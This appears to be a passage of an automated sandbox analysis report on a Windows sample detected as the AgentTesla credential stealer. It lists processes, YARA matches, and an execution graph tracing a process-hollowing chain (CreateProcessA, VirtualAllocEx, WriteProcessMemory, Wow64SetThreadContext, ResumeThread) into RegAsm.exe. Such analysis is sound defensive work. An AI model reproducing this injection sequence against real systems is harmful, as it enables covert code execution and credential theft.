                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:4
                                                                      Start time:17:13:58
                                                                      Start date:19/04/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                      Imagebase:0xef0000
                                                                      File size:65'440 bytes
                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4466181997.0000000003314000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:5
                                                                      Start time:17:13:58
                                                                      Start date:19/04/2024
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                      Imagebase:0x7ff7e52b0000
                                                                      File size:55'320 bytes
                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:10.9%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:128
                                                                        Total number of Limit Nodes:5
                                                                        execution_graph 24605 28a4528 24606 28a453a 24605->24606 24609 28a3cf4 24606->24609 24610 28a3cff 24609->24610 24613 28a40e8 24610->24613 24612 28a45d9 24614 28a40f3 24613->24614 24617 28a4204 24614->24617 24616 28a47fd 24616->24612 24618 28a420f 24617->24618 24621 28a4234 24618->24621 24620 28a48da 24620->24616 24622 28a423f 24621->24622 24625 28a4264 24622->24625 24624 28a49dc 24624->24620 24626 28a426f 24625->24626 24628 28a79db 24626->24628 24632 28aa3f8 24626->24632 24627 28a7a19 24627->24624 24628->24627 24636 28ac4ea 24628->24636 24641 28ac4f8 24628->24641 24646 28aa420 24632->24646 24649 28aa430 24632->24649 24633 28aa40e 24633->24628 24637 28ac4fb 24636->24637 24638 28ac53d 24637->24638 24669 28ac699 24637->24669 24674 28ac6a8 24637->24674 24638->24627 24642 28ac519 24641->24642 24643 28ac53d 24642->24643 24644 28ac6a8 2 API calls 24642->24644 24645 28ac699 2 API calls 24642->24645 24643->24627 24644->24643 24645->24643 24652 28aa528 24646->24652 24647 28aa43f 24647->24633 24650 28aa43f 24649->24650 24651 28aa528 LoadLibraryExW 24649->24651 24650->24633 24651->24650 24653 28aa539 24652->24653 24654 28aa554 24652->24654 24653->24654 24657 28aa7c0 24653->24657 24661 28aa7b2 24653->24661 24654->24647 24658 28aa7d4 24657->24658 24659 28aa7f9 24658->24659 24665 28a98b0 24658->24665 24659->24654 24662 28aa7d4 24661->24662 24663 28a98b0 LoadLibraryExW 24662->24663 24664 28aa7f9 24662->24664 24663->24664 24664->24654 24666 28aa9a0 LoadLibraryExW 24665->24666 24668 28aaa19 24666->24668 24668->24659 24670 28ac64f 24669->24670 24671 28ac6a2 24669->24671 24670->24638 24672 28ac6ef 24671->24672 24678 28ab260 24671->24678 24672->24638 24675 28ac6b5 24674->24675 24676 28ab260 2 API calls 24675->24676 24677 28ac6ef 24675->24677 24676->24677 24677->24638 24679 28ab26b 24678->24679 24680 28ad408 24679->24680 24682 28aca5c 24679->24682 24683 28aca67 24682->24683 24684 28a4264 2 API calls 24683->24684 24685 28ad477 24684->24685 24689 28af208 24685->24689 24695 28af1f0 24685->24695 24686 28ad4b1 24686->24680 24691 28af239 24689->24691 24692 28af33a 24689->24692 24690 28af245 24690->24686 24691->24690 24693 4fb0040 CreateWindowExW 24691->24693 24694 4fb0006 CreateWindowExW 24691->24694 24692->24686 24693->24692 24694->24692 24696 28af1ca 24695->24696 24697 28af1fa 24695->24697 24696->24686 24698 28af245 24697->24698 24699 4fb0040 CreateWindowExW 24697->24699 24700 4fb0006 CreateWindowExW 24697->24700 24698->24686 24699->24698 24700->24698 24720 28aa718 24721 28aa75a 24720->24721 24722 28aa760 GetModuleHandleW 24720->24722 24721->24722 24723 28aa78d 24722->24723 24701 28ac7c0 24702 28ac806 24701->24702 24706 28acd98 24702->24706 24710 28acda8 24702->24710 24703 28ac8f3 24707 28acdab 24706->24707 24713 28ac9fc 24707->24713 24711 28acdd6 24710->24711 24712 28ac9fc DuplicateHandle 24710->24712 24711->24703 24712->24711 24714 28ace10 DuplicateHandle 24713->24714 24715 28acdd6 24714->24715 24715->24703 24716 4fb36d0 24717 4fb3712 24716->24717 24719 4fb3719 24716->24719 24718 4fb376a CallWindowProcW 24717->24718 24717->24719 24718->24719 24724 4fbd906 24726 4fbd064 24724->24726 24725 4fbd8b7 24726->24725 24753 4fbcbc8 24726->24753 24757 4fbcbbc 24726->24757 24727 4fbd127 24728 4fbd233 24727->24728 24743 4fbc7a8 Wow64SetThreadContext 24727->24743 24744 4fbc7a0 Wow64SetThreadContext 24727->24744 24739 4fbca28 ReadProcessMemory 24728->24739 24740 4fbca30 ReadProcessMemory 24728->24740 24729 4fbd324 24749 4fbc878 VirtualAllocEx 24729->24749 24750 4fbc880 VirtualAllocEx 24729->24750 24730 4fbd448 24737 4fbc938 WriteProcessMemory 24730->24737 24738 4fbc940 WriteProcessMemory 24730->24738 24731 4fbd6ce 24751 4fbc938 WriteProcessMemory 24731->24751 24752 4fbc940 WriteProcessMemory 24731->24752 24732 4fbd70d 24734 4fbd7f3 24732->24734 24745 4fbc7a8 Wow64SetThreadContext 24732->24745 24746 4fbc7a0 Wow64SetThreadContext 24732->24746 24733 4fbd4b7 24733->24731 24735 4fbc938 WriteProcessMemory 24733->24735 24736 4fbc940 WriteProcessMemory 24733->24736 24741 4fbc6f8 ResumeThread 24734->24741 24742 4fbc6f0 ResumeThread 24734->24742 24735->24733 24736->24733 24737->24733 24738->24733 24739->24729 24740->24729 24741->24725 24742->24725 24743->24728 24744->24728 24745->24734 24746->24734 24749->24730 24750->24730 24751->24732 24752->24732 24754 4fbcc51 24753->24754 24754->24754 24755 4fbcdb6 CreateProcessA 24754->24755 24756 4fbce13 24755->24756 24758 4fbcc51 24757->24758 24758->24758 24759 4fbcdb6 CreateProcessA 24758->24759 24760 4fbce13 24759->24760

                                                                        Executed Functions

                                                                        Function 04FB7718 Relevance: 7.1, Strings: 5, Instructions: 832COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (o]q$(o]q$,aq$,aq$Haq
                                                                        • API String ID: 0-2157538030
                                                                        • Opcode ID: a366b5190b0c4abbd8745a77e198f7c552d27440cfed76290c388cfb1e106b43
                                                                        • Instruction ID: 75219180f6d3040f79e0f52cb652a204755549730620eeeb32c8c89d1a86eee6
                                                                        • Opcode Fuzzy Hash: a366b5190b0c4abbd8745a77e198f7c552d27440cfed76290c388cfb1e106b43
                                                                        • Instruction Fuzzy Hash: 43626D35A001159FDB08EF6AC884AAEB7F6FF89350F158569E8459B364DB34EC42CBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04FBCF50 Relevance: 1.8, Strings: 1, Instructions: 575COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 955 4fbcf50-4fbcf81 957 4fbcf88-4fbd9a9 955->957 958 4fbcf83 955->958 960 4fbd9af-4fbd9b6 957->960 961 4fbd064-4fbd0d5 957->961 958->957 965 4fbd0e0-4fbd122 961->965 1067 4fbd125 call 4fbcbc8 965->1067 1068 4fbd125 call 4fbcbbc 965->1068 966 4fbd127-4fbd14e 967 4fbd150-4fbd16c 966->967 968 4fbd177-4fbd1e3 966->968 967->968 974 4fbd1ea-4fbd216 968->974 975 4fbd1e5 968->975 977 4fbd218-4fbd22e 974->977 978 4fbd27f-4fbd2ba 974->978 975->974 1063 4fbd231 call 4fbc7a8 977->1063 1064 4fbd231 call 4fbc7a0 977->1064 981 4fbd2bc-4fbd2d7 978->981 982 4fbd2e2 978->982 980 4fbd233-4fbd253 983 4fbd27b-4fbd27d 980->983 984 4fbd255-4fbd270 980->984 981->982 985 4fbd2e3-4fbd2ed 982->985 983->985 984->983 987 4fbd2ef 985->987 988 4fbd2f4-4fbd31f 985->988 987->988 1077 4fbd322 call 4fbca28 988->1077 1078 4fbd322 call 4fbca30 988->1078 991 4fbd324-4fbd344 993 4fbd36c-4fbd385 991->993 994 4fbd346-4fbd361 991->994 995 4fbd3e3-4fbd40a 993->995 996 4fbd387-4fbd3bb 993->996 994->993 1002 4fbd416-4fbd443 995->1002 996->995 1001 4fbd3bd-4fbd3d8 996->1001 1001->995 1069 4fbd446 call 4fbc878 1002->1069 1070 4fbd446 call 4fbc880 1002->1070 1004 4fbd448-4fbd46e 1006 4fbd470-4fbd48b 1004->1006 1007 4fbd496-4fbd4b2 1004->1007 1006->1007 1075 4fbd4b5 call 4fbc938 1007->1075 1076 4fbd4b5 call 4fbc940 1007->1076 1008 4fbd4b7-4fbd4d7 1010 4fbd4d9-4fbd4f4 1008->1010 1011 4fbd4ff-4fbd538 1008->1011 1010->1011 1015 4fbd6a9-4fbd6c8 1011->1015 1016 4fbd6ce 1015->1016 1017 4fbd53d-4fbd56d 1015->1017 1019 4fbd6d7-4fbd708 1016->1019 1021 4fbd69e-4fbd6a3 1017->1021 1022 4fbd573-4fbd57a 1017->1022 1071 4fbd70b call 4fbc938 1019->1071 1072 4fbd70b call 4fbc940 1019->1072 1021->1015 1024 4fbd583-4fbd58f 1022->1024 1023 4fbd70d-4fbd72d 1025 4fbd72f-4fbd74a 1023->1025 1026 4fbd755-4fbd789 1023->1026 1028 4fbd599-4fbd612 1024->1028 1025->1026 1030 4fbd78b-4fbd78e 1026->1030 1031 4fbd791-4fbd7a4 1026->1031 1040 4fbd61b-4fbd650 1028->1040 1030->1031 1032 4fbd7ab-4fbd7d6 1031->1032 1033 4fbd7a6 1031->1033 1038 4fbd7d8-4fbd7ee 1032->1038 1039 4fbd83f-4fbd87a 1032->1039 1033->1032 1065 4fbd7f1 call 4fbc7a8 1038->1065 1066 4fbd7f1 call 4fbc7a0 1038->1066 1043 4fbd87c-4fbd897 1039->1043 1044 4fbd8a2 1039->1044 1073 4fbd653 call 4fbc938 1040->1073 1074 4fbd653 call 4fbc940 1040->1074 1042 4fbd7f3-4fbd813 1046 4fbd83b-4fbd83d 1042->1046 1047 4fbd815-4fbd830 1042->1047 1043->1044 1048 4fbd8a3-4fbd8b2 1044->1048 1045 4fbd655-4fbd675 1049 4fbd69d 1045->1049 1050 4fbd677-4fbd692 1045->1050 1046->1048 1047->1046 1079 4fbd8b5 call 4fbc6f8 1048->1079 1080 4fbd8b5 call 4fbc6f0 1048->1080 1049->1021 1050->1049 1053 4fbd8b7-4fbd8d7 1055 4fbd8d9-4fbd8f4 1053->1055 1056 4fbd8ff-4fbd98d 1053->1056 1055->1056 1056->960 1063->980 1064->980 1065->1042 1066->1042 1067->966 1068->966 1069->1004 1070->1004 1071->1023 1072->1023 1073->1045 1074->1045 1075->1008 1076->1008 1077->991 1078->991 1079->1053 1080->1053
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (
                                                                        • API String ID: 0-3887548279
                                                                        • Opcode ID: b669cbaac20cdbf396ddc8dd2eae6b7738e2cc22cfd6261028608ff450c0d3e1
                                                                        • Instruction ID: 53187f75194f66b1a609d0bad511164524760f76f046b5c4d2fb59bab4dd84b9
                                                                        • Opcode Fuzzy Hash: b669cbaac20cdbf396ddc8dd2eae6b7738e2cc22cfd6261028608ff450c0d3e1
                                                                        • Instruction Fuzzy Hash: 7A52D174D012288FDB68DF65C894BDDBBB2BB89305F1081E9D44DAB291DB316E85CF41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04FB12B7 Relevance: .2, Instructions: 232COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b78aa0876711de10a20e62f37fcb7486824789e563974ef3e14a680adfb514a8
                                                                        • Instruction ID: 0c333d7565c98884fd87e819a6847005d3d96ce40d529580da15781d13181131
                                                                        • Opcode Fuzzy Hash: b78aa0876711de10a20e62f37fcb7486824789e563974ef3e14a680adfb514a8
                                                                        • Instruction Fuzzy Hash: 1A919135E0030A8FCB00DFA1D8949DDF7B6FF8A310F148615E41AAB2A4DB70E946CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 028A4560 Relevance: .1, Instructions: 104COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2029188556.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_28a0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5df852e1e01ecc505bba376996e12f4e5584c80488f00801bef72d2b1fb6d798
                                                                        • Instruction ID: 7ef1580fd344eb4fea9ff45cdfca98e3af899e59bb38243a199ecf4c6d90a75e
                                                                        • Opcode Fuzzy Hash: 5df852e1e01ecc505bba376996e12f4e5584c80488f00801bef72d2b1fb6d798
                                                                        • Instruction Fuzzy Hash: 1041B679E01218CFDB18DFAAD994A9EBBF2BF89311F148129D409BB364DB705802CF11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04FBCBBC Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1081 4fbcbbc-4fbcc5d 1083 4fbcc5f-4fbcc69 1081->1083 1084 4fbcc96-4fbccb6 1081->1084 1083->1084 1085 4fbcc6b-4fbcc6d 1083->1085 1091 4fbccb8-4fbccc2 1084->1091 1092 4fbccef-4fbcd1e 1084->1092 1086 4fbcc6f-4fbcc79 1085->1086 1087 4fbcc90-4fbcc93 1085->1087 1089 4fbcc7b 1086->1089 1090 4fbcc7d-4fbcc8c 1086->1090 1087->1084 1089->1090 1090->1090 1093 4fbcc8e 1090->1093 1091->1092 1094 4fbccc4-4fbccc6 1091->1094 1098 4fbcd20-4fbcd2a 1092->1098 1099 4fbcd57-4fbce11 CreateProcessA 1092->1099 1093->1087 1096 4fbcce9-4fbccec 1094->1096 1097 4fbccc8-4fbccd2 1094->1097 1096->1092 1100 4fbccd6-4fbcce5 1097->1100 1101 4fbccd4 1097->1101 1098->1099 1103 4fbcd2c-4fbcd2e 1098->1103 1112 4fbce1a-4fbcea0 1099->1112 1113 4fbce13-4fbce19 1099->1113 1100->1100 1102 4fbcce7 1100->1102 1101->1100 1102->1096 1104 4fbcd51-4fbcd54 1103->1104 1105 4fbcd30-4fbcd3a 1103->1105 1104->1099 1107 4fbcd3e-4fbcd4d 1105->1107 1108 4fbcd3c 1105->1108 1107->1107 1110 4fbcd4f 1107->1110 1108->1107 1110->1104 1123 4fbcea2-4fbcea6 1112->1123 1124 4fbceb0-4fbceb4 1112->1124 1113->1112 1123->1124 1125 4fbcea8 1123->1125 1126 4fbceb6-4fbceba 1124->1126 1127 4fbcec4-4fbcec8 1124->1127 1125->1124 1126->1127 1128 4fbcebc 1126->1128 1129 4fbceca-4fbcece 1127->1129 1130 4fbced8-4fbcedc 1127->1130 1128->1127 1129->1130 1131 4fbced0 1129->1131 1132 4fbceee-4fbcef5 1130->1132 1133 4fbcede-4fbcee4 1130->1133 1131->1130 1134 4fbcf0c 1132->1134 1135 4fbcef7-4fbcf06 1132->1135 1133->1132 1137 4fbcf0d 1134->1137 1135->1134 1137->1137
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04FBCDFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 3478a93c5352ec8cd2bc5c2922fa6a7792a6f7210233d0454c509ff4ce06f28c
                                                                        • Instruction ID: f2a946aedaf002d78a0d15969cecb8bc677fb8d441336c15b1f368d6c52be651
                                                                        • Opcode Fuzzy Hash: 3478a93c5352ec8cd2bc5c2922fa6a7792a6f7210233d0454c509ff4ce06f28c
                                                                        • Instruction Fuzzy Hash: 50918C71D00259CFEB21CF69CC417EEBBB2BF49304F14856AD858A7280DB74A986CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04FBCBC8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1138 4fbcbc8-4fbcc5d 1140 4fbcc5f-4fbcc69 1138->1140 1141 4fbcc96-4fbccb6 1138->1141 1140->1141 1142 4fbcc6b-4fbcc6d 1140->1142 1148 4fbccb8-4fbccc2 1141->1148 1149 4fbccef-4fbcd1e 1141->1149 1143 4fbcc6f-4fbcc79 1142->1143 1144 4fbcc90-4fbcc93 1142->1144 1146 4fbcc7b 1143->1146 1147 4fbcc7d-4fbcc8c 1143->1147 1144->1141 1146->1147 1147->1147 1150 4fbcc8e 1147->1150 1148->1149 1151 4fbccc4-4fbccc6 1148->1151 1155 4fbcd20-4fbcd2a 1149->1155 1156 4fbcd57-4fbce11 CreateProcessA 1149->1156 1150->1144 1153 4fbcce9-4fbccec 1151->1153 1154 4fbccc8-4fbccd2 1151->1154 1153->1149 1157 4fbccd6-4fbcce5 1154->1157 1158 4fbccd4 1154->1158 1155->1156 1160 4fbcd2c-4fbcd2e 1155->1160 1169 4fbce1a-4fbcea0 1156->1169 1170 4fbce13-4fbce19 1156->1170 1157->1157 1159 4fbcce7 1157->1159 1158->1157 1159->1153 1161 4fbcd51-4fbcd54 1160->1161 1162 4fbcd30-4fbcd3a 1160->1162 1161->1156 1164 4fbcd3e-4fbcd4d 1162->1164 1165 4fbcd3c 1162->1165 1164->1164 1167 4fbcd4f 1164->1167 1165->1164 1167->1161 1180 4fbcea2-4fbcea6 1169->1180 1181 4fbceb0-4fbceb4 1169->1181 1170->1169 1180->1181 1182 4fbcea8 1180->1182 1183 4fbceb6-4fbceba 1181->1183 1184 4fbcec4-4fbcec8 1181->1184 1182->1181 1183->1184 1185 4fbcebc 1183->1185 1186 4fbceca-4fbcece 1184->1186 1187 4fbced8-4fbcedc 1184->1187 1185->1184 1186->1187 1188 4fbced0 1186->1188 1189 4fbceee-4fbcef5 1187->1189 1190 4fbcede-4fbcee4 1187->1190 1188->1187 1191 4fbcf0c 1189->1191 1192 4fbcef7-4fbcf06 1189->1192 1190->1189 1194 4fbcf0d 1191->1194 1192->1191 1194->1194
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04FBCDFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 0c95a16220ae8084b079983f01bd249f790cb4b47dfecd76894cad256cdf2ef2
                                                                        • Instruction ID: 44c08dfc3c889cdfa66c40074a94cddde36b07dee96f1e7fc537e9cc1e360e39
                                                                        • Opcode Fuzzy Hash: 0c95a16220ae8084b079983f01bd249f790cb4b47dfecd76894cad256cdf2ef2
                                                                        • Instruction Fuzzy Hash: 35918C71D00259CFEB21CF69CC417EEBBB2BF49314F14856AD858A7280DB74A986CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04FB0F70 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1195 4fb0f70-4fb0fd6 1196 4fb0fd8-4fb0fde 1195->1196 1197 4fb0fe1-4fb0fe8 1195->1197 1196->1197 1198 4fb0fea-4fb0ff0 1197->1198 1199 4fb0ff3-4fb1092 CreateWindowExW 1197->1199 1198->1199 1201 4fb109b-4fb10d3 1199->1201 1202 4fb1094-4fb109a 1199->1202 1206 4fb10e0 1201->1206 1207 4fb10d5-4fb10d8 1201->1207 1202->1201 1208 4fb10e1 1206->1208 1207->1206 1208->1208
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04FB1082
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: f9c91d45ae7ab5ad29b5e242b111939c0cd9039225749fff8c73f4605382428b
                                                                        • Instruction ID: 5813374be4c021ef4000805dadad35cac75a0653cd35aefec8840fc4f22f0810
                                                                        • Opcode Fuzzy Hash: f9c91d45ae7ab5ad29b5e242b111939c0cd9039225749fff8c73f4605382428b
                                                                        • Instruction Fuzzy Hash: 7B41E0B1D00359EFDB14CF9AC984ADEBBB5FF49350F24812AE818AB210D774A841CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04FB36D0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1209 4fb36d0-4fb370c 1210 4fb37bc-4fb37dc 1209->1210 1211 4fb3712-4fb3717 1209->1211 1217 4fb37df-4fb37ec 1210->1217 1212 4fb376a-4fb37a2 CallWindowProcW 1211->1212 1213 4fb3719-4fb3750 1211->1213 1214 4fb37ab-4fb37ba 1212->1214 1215 4fb37a4-4fb37aa 1212->1215 1220 4fb3759-4fb3768 1213->1220 1221 4fb3752-4fb3758 1213->1221 1214->1217 1215->1214 1220->1217 1221->1220
                                                                        APIs
                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 04FB3791
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: CallProcWindow
                                                                        • String ID:
                                                                        • API String ID: 2714655100-0
                                                                        • Opcode ID: 283d5f7b66e7cb566415e5d6d46a64c76dc9892ae36b93c485b64adcf8638832
                                                                        • Instruction ID: 9309b36039e208783d1d454ff981fd3210545376f4ad04e9bbd93e8fa86767bf
                                                                        • Opcode Fuzzy Hash: 283d5f7b66e7cb566415e5d6d46a64c76dc9892ae36b93c485b64adcf8638832
                                                                        • Instruction Fuzzy Hash: A1413BB9A00309CFDB14CF9AC448AAABBF5FF89314F25C459D919A7321D334A841CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04FBC938 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1223 4fbc938-4fbc98e 1226 4fbc99e-4fbc9dd WriteProcessMemory 1223->1226 1227 4fbc990-4fbc99c 1223->1227 1229 4fbc9df-4fbc9e5 1226->1229 1230 4fbc9e6-4fbca16 1226->1230 1227->1226 1229->1230
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04FBC9D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 349a3e772a133103ddb87e02b9dd0af1d2642bd1e05abedc9cb9bc296d628493
                                                                        • Instruction ID: deda30fe8ca9a531295c06e06aa9c43755515f545fab27d2a8f106b17ed6770a
                                                                        • Opcode Fuzzy Hash: 349a3e772a133103ddb87e02b9dd0af1d2642bd1e05abedc9cb9bc296d628493
                                                                        • Instruction Fuzzy Hash: F4214871D003499FDB10DFAAC881BEEBBF5FF48310F10842AE959A7240C778A955CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04FBC940 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1234 4fbc940-4fbc98e 1236 4fbc99e-4fbc9dd WriteProcessMemory 1234->1236 1237 4fbc990-4fbc99c 1234->1237 1239 4fbc9df-4fbc9e5 1236->1239 1240 4fbc9e6-4fbca16 1236->1240 1237->1236 1239->1240
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04FBC9D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 5cf5949a8111dc04c3a5c902b42401ae5fe65c0565d4cc4a142693f27afdd821
                                                                        • Instruction ID: 8dd5ecd8e1254213efe3e73479e9a1046bf23242a8c36037f365a3f30f53a01a
                                                                        • Opcode Fuzzy Hash: 5cf5949a8111dc04c3a5c902b42401ae5fe65c0565d4cc4a142693f27afdd821
                                                                        • Instruction Fuzzy Hash: AA212A71D003499FDB10DFAAC885BEEBBF5FF48310F108429E559A7240C778A955CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04FBCA28 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1244 4fbca28-4fbcabd ReadProcessMemory 1248 4fbcabf-4fbcac5 1244->1248 1249 4fbcac6-4fbcaf6 1244->1249 1248->1249
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04FBCAB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: a14cfe962722561453111e956b2d3caccd8c79c77b935cb2faed00ea1139754d
